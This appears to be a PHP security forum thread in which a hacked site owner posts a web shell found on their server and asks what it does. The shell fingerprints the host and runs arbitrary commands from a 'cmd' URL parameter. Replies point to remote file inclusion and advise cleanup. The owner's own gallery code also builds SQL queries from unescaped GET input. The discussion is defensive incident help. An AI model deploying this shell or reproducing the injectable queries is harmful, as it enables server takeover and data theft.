Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.
Nope, I was hosted with them once, and I had several instances where there servers were compromised and hundreds of their clients sites got hacked similar to yours. They could not ever locate the cause of the breach and their only support assistance was restoring the site files to what they were two days ago.
I have switched to a dedicated server and have not had that problem any more. I asked the question just as a gauge as to whether they have finally figured out how to secure a server or not.
/*
* *** By Andi_ ***
* * smurnoffsrv (at) gmail dot com *
* * replace dot with "." *
* * replace (at) with "@" *
*
*/
//INFO table (pro and normal)
/*if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";*/
$safe = @ini_get('safe_mode');
if ($safe) $pro.="<b><i>safe_mode</i>: $safe</b>, "; else $pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP </i>".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<tr><td><b><?=$info ?>:</b> <?=$value;?></td></tr><?php } ?>
<tr><td><b>pro info: ip </b><?="$ip, $pro";?></td></tr>
<?
$pego = $_GET['cmd'];
$out1 = shell_exec($pego);
$out2 = exec($pego);
$out3 = system($pego, $retval);
echo "<pre>$out1</pre>";
echo "<pre>$out2</pre>";
\
This was the code that i found at the sites that i had filtered through my access logs....im not sure what it does...as i am failing in trying to reproduce what it does
timvw wrote:It executes any shell command you pass via the cmd parameter in the URI...
if he's trying to do that...then how in the hell is he able to execute them from my site? on my server?
from what the access logs provided he is passing a url (this is the url for which i found that execute script) as a paramater to my app....But the thing is...i am not including the paramter....its actually going to a SQL statement...thus im not doing anything concerning server execute commands
i am however doing alot of include statements so im wondering if that could be the problem
Exploiting remote include is a common flaw (that common that most hosts don't allow remote include anymore)...
My advice: make a backup of your existing site (in case you can't find a recent backup) and take it all offline... Make sure you change all your passwords (including database credentials since it's pretty sure these have been exposed to the attackers)...
<?php
/*
This page will dynamically display the photo index for the gallery
and allow the user to page thru the the gallery one page at a time
*/
require($_SERVER['DOCUMENT_ROOT'].'/Connections/opmConn2.php');
define ("ALBUM_PATH", "http://www.".$_SERVER['HTTP_HOST']."/photo_gallery/"); // relative path to photos
function display_gallerySelect($conn){
$galleryID = htmlentities($_GET['gid']);
// Build the HTML for the option select to change the Gallery
$query_galleryRS = "SELECT * FROM galleries WHERE `Status` = 1 ORDER BY DateID DESC";
$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
$row_galleryRS = mysql_fetch_assoc($galleryRS);
$selectHTML = "<select name=\"gid\" id=\"gid\">"; // Initiate the select variable to store the HTML
do { // Loop thru record set to populate options
$selectText = ""; // Used to set whether option is selected or not
$galleryID = $row_galleryRS['GalleryID'];
$galleryTitle = $row_galleryRS['Title'];
if ($row_galleryRS['GalleryID'] == $galleryID){ // if the GalleryID column = the current gallery
$currentGallery = $galleryTitle; // set current gallery
$selectText = "selected"; // Set selected text for this option
}
$selectHTML .= "<option value=\"".$row_galleryRS['GalleryID']."\" ".$selectText.">".$galleryTitle."</option>";
} while ($row_galleryRS = mysql_fetch_assoc($galleryRS));
$selectHTML .= "</select><input name=\"pid\" type=\"hidden\" value=\"gallery\"> <input type=\"submit\" name=\"submit\" value=\"Go\">";
return $selectHTML;
} //end display_gallerySelect()
function get_currentGallery($conn){
$galleryID = htmlentities($_GET['gid']);
$query_galleryRS = "SELECT * FROM galleries WHERE GalleryID = '$galleryID)'";
$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
$row_galleryRS = mysql_fetch_assoc($galleryRS);
$currentGallery = $row_galleryRS['Title'];
return $currentGallery;
} //end get_currentGallery()
function display_galleryIndex($conn){
$photosPerRow = 2;
$colCount = 1; //Initialize the column count of the row
$galleryID = htmlentities($_GET['gid']);
$currentPhoto = "";
if (isset($_GET['id']))
$currentPhoto = $_GET['id'];
$galleryIndexHtml = ""; // Initialize variable to store the the gallery index HTML
$photoNum=0; // To match the current photo that in the index
$imgFile = ""; // To store the path to the current image
$imgSrcHTML = ""; // Initialize the variable to store the <img src> HTML
$query_photosRS = "SELECT * FROM photos WHERE Gallery = '$galleryID' AND `Status` = 1 ORDER BY PhotoID";
$photosRS = mysql_query($query_photosRS, $conn) or die(mysql_error());
$row_photosRS = mysql_fetch_assoc($photosRS);
$totalPhotos = mysql_num_rows($photosRS);
$numRows = ceil($totalPhotos/$photosPerRow);
// To highlight Current photo when Gallery first loads
if ($currentPhoto == "")
$currentPhoto = $row_photosRS['PhotoID'];
do {
$photoID = $row_photosRS['PhotoID'];
$photoClass = "photoOff"; // Style for Photo Border
$photoID = $row_photosRS['PhotoID'];
if ($colCount > $photosPerRow){
$galleryIndexHtml .= "</tr><tr>"; // Break to new row
$colCount = 1; // Reset Column Count
}
if ($photoID == $currentPhoto){
$photoClass = "photoOn";
// === Build HTML for Current Photo
$imgCaption = $row_photosRS['Caption'];
$imgFile = "/photo_gallery/".$row_photosRS['Gallery']."/".$photoID."_450.jpg";
$imgSrcHTML = "<img src=\"".$imgFile."\" width=\"450\" alt=\"".$imgCaption."\" class=\"$photoClass\">";
/* // Image Size
$imageSize = GetImageSize ($_SERVER['DOCUMENT_ROOT'].$imgFile);
$imageWidth = $imageSize[0];
$imageHeight = $imageSize[1];
$windowWidth = 70+$imageSize[0];
$windowHeight = 340+$imageHeight; */
}
$galleryIndexHtml .= sprintf("<td><a href=\"/photo_gallery/gallery.php?gid=$galleryID&id=$photoID\"><img src=\"/photo_gallery/%s/".$photoID."_70.jpg\" width=\"70\" alt=\"".$row_photosRS['Caption']."\" class=\"".$photoClass."\"></a></td>",$galleryID);
$colCount++;
$photoNum++;
} while ($row_photosRS = mysql_fetch_assoc($photosRS));
return $galleryIndexHtml;
} // end display_galleryIndex()
function get_imgSrcHTML($conn){
$currentPhoto = "";
$galleryID = htmlentities($_GET['gid']);
$imgPath = "/photo_gallery/$galleryID/";
if (isset($_GET['id']))
$currentPhoto = $_GET['id'];
if($currentPhoto != ""){
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
} else {
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID);
}
$currentPhotosRS = mysql_query($query_currentPhotosRS, $conn) or die(mysql_error());
$row_currentPhotosRS = mysql_fetch_assoc($currentPhotosRS);
$photoID = $row_currentPhotosRS['PhotoID'];
global $currentImgCaption;
$currentImgCaption = $row_currentPhotosRS['Caption'];
$imgFile = $photoID."_450.jpg"; // To store the path to the current image
$imgSrcHTML = "<img src=\"".$imgPath.$imgFile."\" width=\"450\" alt=\"".$currentImgCaption."\" class=\"featuresImg\">";
return $imgSrcHTML;
} //end get_imgSrcHTML()
?>
and here is a function to which does the file includes
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);